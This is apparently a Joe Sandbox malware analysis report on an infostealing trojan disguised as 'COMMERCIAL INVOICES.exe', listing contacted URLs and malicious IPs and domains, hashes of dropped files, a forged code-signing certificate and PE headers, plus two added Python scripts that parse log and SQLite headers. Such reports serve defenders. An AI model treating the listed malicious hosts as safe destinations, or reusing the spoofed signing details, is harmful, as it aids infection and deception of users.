                                                                                                                                                                            http://www.5711337.xyz/uploads/images/7115492.jpgtaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              http://www.5711337.xyz/uploads/images/1647670.jpgtaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                http://www.5711337.xyz/chaomeihuixiang/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  http://www.5711337.xyz/Dating/079f6299858.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://www.5711337.xyz/Marry/214a799778.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      http://www.5711337.xyz/fengjianyoumei/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        http://www.5711337.xyz/sitemap.xmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://www.5711337.xyz/uploads/images/7115491.jpgtaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=taskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                            unknown
                                                                                                                                                                                            http://www.5711337.xyz/tengpuhui/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              http://www.5711337.xyz/taonaimuxiangnai/oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://www.5711337.xyz/uploads/images/2064240.jpgtaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://www.5711337.xyzoKWoZthfkV.exe, 00000009.00000002.3898777340.0000000000D27000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://www.5711337.xyz/Dating/540a6299397.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      http://www.5711337.xyz/uploads/images/8042350.jpgtaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        http://www.5711337.xyz/Dating/33e6299904.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          https://c.mipcdn.com/static/v1/mip.csstaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://www.5711337.xyz/Marry/592d6299345.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtaskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://www.5711337.xyz/Friends/494a799498.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                http://www.5711337.xyz/template/news/mip05/css/fontawesome-all.min.csstaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  http://www.5711337.xyz/Friends/320a6299617.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    http://www.5711337.xyz/Love/669b6299268.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      http://www.5711337.xyz/Dating/430a6299507.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        http://www.5711337.xyz/uploads/images/194750.jpgtaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          http://www.5711337.xyz/shuiximeili/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            http://www.5711337.xyz/jizemingbuf/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://www.5711337.xyz/Friends/350f099649.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://www.5711337.xyz/uploads/images/5074320.jpgtaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://www.5711337.xyz/gongdilan/oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                    104.21.42.219
                                                                                                                                                                                                                                    www.n-paylity.shopUnited States
                                                                                                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                    154.23.184.95
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1531665
Start date and time: 2024-10-11 15:07:31 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 21s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: COMMERCIAL INVOICES.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@10/9
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 89%
• Number of executed functions: 83
• Number of non-executed functions: 286
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Excluded processes from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report creation exceeded the maximum time and may be missing disassembly code information.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: COMMERCIAL INVOICES.exe
Time | Type | Description
09:09:49 | API Interceptor | 5621117x Sleep call for process: taskkill.exe modified
                                                                                                                                                                                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                    • 38.63.117.247
                                                                                                                                                                                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                    • 38.43.93.83
CLOUDFLARENETUS
  https://tzr7wtjq.r.us-east-1.awstrack.me/L0/https:%2F%2Fclickproxy.retailrocket.net%2F%3Furl=https%253A%252F%252Fneamunit.ro%2F%2Fwinners%2F%2Fnatalie.gilbert%2FbmF0YWxpZS5naWxiZXJ0QGJlbm5ldHRzLmNvLnVr/1/010001927b41f2f4-541067bc-8926-4dcb-8f02-24fcf186dd1a-000000/pqvbHhvZKuWAqkc2J1BWoU1pciA=395 (malicious, HTMLPhisher) • 188.114.96.3
  Quotation-GINC-19-00204.exe (malicious, GuLoader, Snake Keylogger) • 188.114.97.3
  New order PO#001498.exe (malicious, MassLogger RAT, PureLog Stealer) • 188.114.96.3
  PO 2024-91113.scr.exe (malicious, Snake Keylogger, VIP Keylogger) • 188.114.96.3
  https://tzr7wtjq.r.us-east-1.awstrack.me/L0/https:%2F%2Fclickproxy.retailrocket.net%2F%3Furl=https%253A%252F%252Fneamunit.ro%2F%2Fwinners%2F%2Fnatalie.gilbert%2FbmF0YWxpZS5naWxiZXJ0QGJlbm5ldHRzLmNvLnVr/1/010001927b41f2f4-541067bc-8926-4dcb-8f02-24fcf186dd1a-000000/pqvbHhvZKuWAqkc2J1BWoU1pciA=395 (malicious, HTMLPhisher) • 188.114.97.3
  invoice.exe (malicious, MinerDownloader, RedLine, Xmrig) • 104.20.3.235
  https://stacksports.captainu.com (malicious, Unknown) • 162.247.243.29
  https://na2.docusign.net/Signing/EmailStart.aspx?a=8ad02d97-8076-44e2-a042-fe16530c5407&etti=24&acct=c5a8c3f6-b465-4834-92a5-13d8938404ab&er=f0b416b1-58c5-41c9-b4fc-e691bed625b5 (malicious, HTMLPhisher) • 172.67.201.111
  http://host.cloudsonicwave.com (malicious, Unknown) • 188.114.96.3
  http://host.cloudsonicwave.com (malicious, Unknown) • 188.114.96.3
No context
No context
Process: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
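The preview above is a comma-separated log of assembly binds written by the .NET runtime while the sample's managed stub ran. The parser below is an added example for this page, not code from the report or from Joe Sandbox. Its sample input is the preview's visible rows with their CRLF line endings restored (the cut-off System.Xml row is left out), and the meaning it assigns to the record types (1 = runtime setting, 2 = assembly bound with no native image recorded, 3 = assembly bound to the NGEN native image at the given path) is an assumption inferred from the field layout, not something the report states.

```python
"""Parse the CSV-style .NET assembly-bind log shown in the dropped-file preview.

Added example; not part of the Joe Sandbox report.  The record-type meanings
(1 = runtime setting, 2 = assembly bound without a native image, 3 = assembly
bound to an NGEN native image whose path is the third field) are an
assumption inferred from the visible rows.
"""
import csv

# Constructed sample input: the rows visible in the report preview, with the
# CRLF separators (shown as ".." in the preview) restored.  The final row of
# the preview is truncated in the report and is therefore omitted here.
SAMPLE_LOG = "\r\n".join([
    '1,"fusion","GAC",0',
    '1,"WinRT","NotApp",1',
    '2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0',
    r'3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0',
    '2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0',
    r'3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0',
    r'3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0',
]) + "\r\n"


def parse_loader_log(text):
    """Return (settings, assemblies).

    settings   -> {setting name: value} from type-1 records
    assemblies -> list of {"name": strong name, "native_image": path or None}
                  in bind order, from type-2 and type-3 records
    Unknown or short rows are skipped rather than raising, so a log that was
    cut off mid-line (as in the report preview) still parses.
    """
    settings = {}
    assemblies = []
    # csv handles the quoted, comma-containing strong names; splitlines()
    # strips the CRLF terminators before the reader sees them.
    for row in csv.reader(text.splitlines()):
        if not row:
            continue
        kind = row[0]
        if kind == "1" and len(row) >= 3:
            settings[row[1]] = row[2]
        elif kind == "2" and len(row) >= 2:
            assemblies.append({"name": row[1], "native_image": None})
        elif kind == "3" and len(row) >= 3:
            assemblies.append({"name": row[1], "native_image": row[2]})
    return settings, assemblies


def simple_names(assemblies):
    """Strip the strong-name suffix: 'System.Xml, Version=...' -> 'System.Xml'."""
    return [a["name"].split(",", 1)[0] for a in assemblies]


def native_image_count(assemblies):
    """How many binds were satisfied from an NGEN native image (.ni.dll)."""
    return sum(1 for a in assemblies if a["native_image"] is not None)


if __name__ == "__main__":
    cfg, binds = parse_loader_log(SAMPLE_LOG)
    print("settings:", cfg)
    for a in binds:
        print("%-22s %s" % (a["name"].split(",", 1)[0], a["native_image"] or "(no native image)"))
```

The assemblies listed here are the ones the managed wrapper bound; the injected payload that the report's behaviour signatures describe runs as native code and leaves no trace in this log.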
Process: C:\Windows\SysWOW64\taskkill.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.121297215059106
Encrypted: false
SSDEEP: 384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5: D87270D0039ED3A5A72E7082EA71E305
SHA1: 0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256: F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512: 18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious: false
Reputation: high, very likely benign file
Preview: SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
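The File Type line above is libmagic's reading of the 100-byte SQLite header, and Entropy (8bit) is the Shannon entropy of the whole file. The decoder below is an added example for this page, not code from the report or from Joe Sandbox. Because the dropped database itself is not reproduced on the page, it builds a constructed header carrying the same values the report lists, decodes it with the field offsets from the SQLite 3 file-format specification, and computes entropy the way a packer heuristic does.

```python
"""Decode the SQLite 3 header fields summarised in the report's File Type line
and compute the 8-bit Shannon entropy reported as "Entropy (8bit)".

Added example; not part of the Joe Sandbox report.  Field offsets follow the
SQLite file-format specification (first 100 bytes of the database).
"""
import math
import struct
from collections import Counter

MAGIC = b"SQLite format 3\x00"
ENCODINGS = {1: "UTF-8", 2: "UTF-16le", 3: "UTF-16be"}


def parse_sqlite_header(data):
    """Return the header fields libmagic prints for a SQLite 3 file.

    Raises ValueError when the magic string is absent or the header is short,
    so a truncated or non-SQLite dropped file is reported rather than
    mis-decoded.
    """
    if len(data) < 100 or data[:16] != MAGIC:
        raise ValueError("not a SQLite 3 database header")
    page_size = struct.unpack_from(">H", data, 16)[0]
    if page_size == 1:                 # the value 1 encodes a 65536-byte page
        page_size = 65536
    # Nine big-endian u32 fields starting at offset 24 (spec order).
    (change_counter, db_pages, _freelist_trunk, _freelist_count,
     schema_cookie, schema_format, _cache_size, _largest_root,
     text_encoding) = struct.unpack_from(">9I", data, 24)
    version_valid_for, sqlite_version = struct.unpack_from(">2I", data, 92)
    return {
        "page_size": page_size,
        "file_counter": change_counter,
        "database_pages": db_pages,
        "schema_cookie": schema_cookie,
        "schema_format": schema_format,
        "encoding": ENCODINGS.get(text_encoding, "unknown"),
        "version_valid_for": version_valid_for,
        "sqlite_version": sqlite_version,
        # SQLITE_VERSION_NUMBER is M*1000000 + m*1000 + p
        "sqlite_version_str": "%d.%d.%d" % (sqlite_version // 1000000,
                                            sqlite_version // 1000 % 1000,
                                            sqlite_version % 1000),
    }


def describe(fields):
    """Render the fields in the wording used by the report's File Type line."""
    return ("SQLite 3.x database, last written using SQLite version %d, "
            "page size %d, file counter %d, database pages %d, cookie 0x%x, "
            "schema %d, %s, version-valid-for %d" % (
                fields["sqlite_version"], fields["page_size"],
                fields["file_counter"], fields["database_pages"],
                fields["schema_cookie"], fields["schema_format"],
                fields["encoding"], fields["version_valid_for"]))


def build_sqlite_header(page_size=2048, change_counter=8, db_pages=89,
                        schema_cookie=0x36, schema_format=4,
                        sqlite_version=3042000):
    """Constructed sample input: a header with the values the report lists.
    These are NOT the bytes of the dropped file, only a header that decodes
    to the same File Type line."""
    hdr = bytearray(100)
    hdr[0:16] = MAGIC
    struct.pack_into(">H", hdr, 16, page_size)
    hdr[18] = hdr[19] = 1                       # write/read format: legacy
    hdr[21], hdr[22], hdr[23] = 64, 32, 32      # fixed payload fractions
    struct.pack_into(">9I", hdr, 24, change_counter, db_pages, 0, 0,
                     schema_cookie, schema_format, 0, 0, 1)  # 1 = UTF-8
    struct.pack_into(">2I", hdr, 92, change_counter, sqlite_version)
    return bytes(hdr)


def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte, 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


if __name__ == "__main__":
    header = build_sqlite_header()
    print(describe(parse_sqlite_header(header)))
    one_page = header + bytes(2048 - len(header))
    print("entropy of a zero-padded 2048-byte page: %.3f" % shannon_entropy(one_page))
```

The 1.12 reported for this 196608-byte database reflects pages that are mostly zero-filled, as the run of dots in the preview suggests. By contrast, the 7.86 reported for the sample itself in the static file information is at the level of compressed or encrypted data, which is consistent with the report's ".NET source code contains potential unpacker" signature.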
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.862679241254475
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 50.01%
• Win32 Executable (generic) a (10002005/4) 49.97%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: COMMERCIAL INVOICES.exe
File size: 717'832 bytes
MD5: 57ccf777596297f30d94bc1394d4b38f
SHA1: 21fecf43b375e8171f96e13d3d88e83fa5f05cb7
SHA256: 29872a0c2ff44faae6e8b1cb4f561978c51a21a195bf545b22e76451521b92d3
SHA512: 93368d54f5e59987f49252472a7d8751b5acfbdd7019b50a971890872dd008f72349e3d3d56823a059e12ddf480221e83cc5bfccb14b17d499575ccfe8e5d5c0
                                                                                                                                                                                                                                    SSDEEP:12288:YP12gXnflefVU5T0vJ8PvkcbNHCxu0CYwWMVMkH/0Z9r5b5WqpAgPkR:Y7flhT0iEAHzhPH/0by0AgK
                                                                                                                                                                                                                                    TLSH:B9E412A19A2AEC61C6A503F00531E77627F52FE9E412E3638EFDECDB75463A130A4351
                                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...S..g..............0.............B.... ........@.. ....................... ............`................................
                                                                                                                                                                                                                                    Icon Hash:01242c66198d8d9e
                                                                                                                                                                                                                                    Entrypoint:0x4ac542
                                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                                    Digitally signed:true
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                    Time Stamp:0x6707A653 [Thu Oct 10 10:02:59 2024 UTC]
                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                    File Version Major:4
                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                                                                                    Signature Valid:false
                                                                                                                                                                                                                                    Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                    Error Number:-2146869232
                                                                                                                                                                                                                                    Not Before, Not After
                                                                                                                                                                                                                                    • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                                                                                                                                                                                                                    Subject Chain
                                                                                                                                                                                                                                    • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                                                                                                                                                                    Version:3
                                                                                                                                                                                                                                    Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                                                                                                                                                                    Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                                                                                                                                                                    Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                                                                                                                                                                    Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                    jmp dword ptr [00402000h]
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
